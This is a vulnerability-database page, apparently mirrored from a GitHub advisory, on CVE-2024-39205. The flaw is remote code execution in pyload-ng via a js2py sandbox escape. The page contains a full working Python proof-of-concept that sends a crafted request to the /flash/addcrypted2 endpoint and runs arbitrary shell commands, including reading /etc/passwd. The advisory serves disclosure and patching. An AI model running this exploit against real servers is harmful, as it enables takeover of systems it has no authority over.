Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-r9pp-r4xf-597r

Опубликовано: 09 сент. 2024
Источник: github
Github: Прошло ревью
CVSS4: 9.3
CVSS3: 9.8

Описание

pyload-ng vulnerable to RCE with js2py sandbox escape

Summary

Any pyload-ng running under python3.11 or below are vulnerable under RCE. Attacker can send a request containing any shell command and the victim server will execute it immediately.

Details

js2py has a vulnerability of sandbox escape assigned as CVE-2024-28397, which is used by the /flash/addcrypted2 API endpoint of pyload-ng. Although this endpoint is designed to only accept localhost connection, we can bypass this restriction using HTTP Header, thus accessing this API and achieve RCE.

PoC

The PoC is provided as poc.py below, you can modify the shell command it execute:

import socket import base64 from urllib.parse import quote host, port = input("host: "), int(input("port: ")) payload = """ // [+] command goes here: let cmd = "head -n 1 /etc/passwd; calc; gnome-calculator;" let hacked, bymarve, n11 let getattr, obj hacked = Object.getOwnPropertyNames({}) bymarve = hacked.__getattribute__ n11 = bymarve("__getattribute__") obj = n11("__class__").__base__ getattr = obj.__getattribute__ function findpopen(o) { let result; for(let i in o.__subclasses__()) { let item = o.__subclasses__()[i] if(item.__module__ == "subprocess" && item.__name__ == "Popen") { return item } if(item.__name__ != "type" && (result = findpopen(item))) { return result } } } n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate() console.log(n11) function f() { return n11 } """ crypted_b64 = base64.b64encode(b"1234").decode() data = f"package=pkg&crypted={quote(crypted_b64)}&jk={quote(payload)}" request = f"""\ POST /flash/addcrypted2 HTTP/1.1 Host: 127.0.0.1:9666 Content-Type: application/x-www-form-urlencoded Content-Length: {len(data)} {data} """.encode().replace(b"\n", b"\r\n") def main(): s = socket.socket() s.connect((host, port)) s.send(request) response = s.recv(1024).decode() print(response) if __name__ == "__main__": main()

Impact

Anyone who runs the latest version (<=0.5.0b3.dev85) of pyload-ng under python3.11 or below. pyload-ng doesn't use js2py for python3.12 or above.

Ссылки

Пакеты

Наименование

pyload-ng

pip
Затронутые версииВерсия исправления

<= 0.5.0b3.dev85

Отсутствует

EPSS

Процентиль: 99%
0.83563
Высокий

9.3 Critical

CVSS4

9.8 Critical

CVSS3

CVE ID

CVE-2024-39205

Дефекты

CWE-94

Связанные уязвимости

nvd логотип

CVE-2024-39205

CVSS3: 9.8
nvd
больше 1 года назад

An issue in pyload-ng v0.5.0b3.dev85 running under python3.11 or below allows attackers to execute arbitrary code via a crafted HTTP request.

fstec логотип

BDU:2024-09082

CVSS3: 9.8
fstec
больше 1 года назад

Уязвимость программного обеспечения для загрузки файлов pyload, связанная с недостаточной проверкой вводимых данных, позволяющая нарушителю выполнить произвольный код

EPSS

Процентиль: 99%
0.83563
Высокий

9.3 Critical

CVSS4

9.8 Critical

CVSS3

CVE ID

CVE-2024-39205

Дефекты

CWE-94